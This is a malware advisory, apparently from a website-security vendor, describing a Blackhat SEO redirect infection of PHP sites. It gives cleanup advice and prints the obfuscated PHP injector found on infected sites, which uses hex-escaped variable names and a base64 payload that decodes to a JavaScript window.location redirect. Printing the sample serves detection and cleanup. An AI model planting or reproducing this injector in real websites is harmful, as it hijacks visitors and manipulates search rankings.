PRICING SUPPORT LOGIN

Redirecting website traffic is another Blackhat SEO malicious technique. BlackHat SEO is used to manipulate the search engine results in order to benefit a website in terms of relevance.
The attacker used different encoding techniques to hide the javascript code, which is the final payload, calling window.location() function.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for obfuscated code (similar to the dump below) or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.

Dump


<?php
/* copyright */
${"\x47L\x4f\x42AL\x53"}["\x73v\x72djd\x71e\x6e"] = "\x76";
${"\x47\x4cOB\x41LS"}["k\x63\x77\x72\x77\x71\x76\x70d\x78\x65\x67"] = "t\x78t";
$bhrnpxrlx = "\x6b";
${"G\x4c\x4f\x42A\x4c\x53"}["kt\x62\x6c\x69tyt\x67\x64"] = "k";
foreach ($_GET as ${$bhrnpxrlx} => ${${"\x47\x4cOB\x41\x4c\x53"}["\x73\x76\x72dj\x64\x71e\x6e"]})
if (preg_match("!\x5e\x5ba-\x7a\x30\x2d9]\x7b\x310\x2c\x33\x32}\$!is", ${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6btblit\x79t\x67d"]})) {
$yghiudnxut = "\x6b";
${"G\x4c\x4fB\x41\x4c\x53"}["\x62\x79\x69\x63h\x6a\x69"] = "t\x78t";
${${"G\x4c\x4fB\x41\x4c\x53"}["byi\x63\x68\x6ai"]} = base64_decode("P\x305o\x633\x52\x79K\x510\x4bey\x42\x32Y\x58\x49g\x61W\x52\x34I\x44\x30\x67\x633\x52\x79\x4c\x6dlu\x5aGV\x34T2Y\x6fJz\x38nKTs\x67a\x57\x59g\x4b\x47\x6c\x6b\x65CA\x39\x50\x53\x41t\xEE\x77\x4e\x54\x42\x44R\x45\x4d\x78\x4dTA4\x4d\x44A\x77N\x55Z\x47Q\x6b\x4aE\x4d\x30\x51\x7aQ\x7a\x55\x77OEY\x33M\x44VGQ\x6a\x41xMDR\x44\x52\x43I\x70Ow\x30\x4bL\x79\x38\x74\x4c\x54\x34g\x50C\x39\x54Q1\x4aJ\x55FQ\x2b");
echo str_replace("\x5aZ\x5a\x5a", ${$yghiudnxut}, ${${"\x47\x4cO\x42AL\x53"}["\x6b\x63\x77\x72\x77\x71v\x70dxe\x67"]});
exit;
}
/* copyright */
?>

Decoded to:
<script language="javascript">window.location="http:// site removed";</script>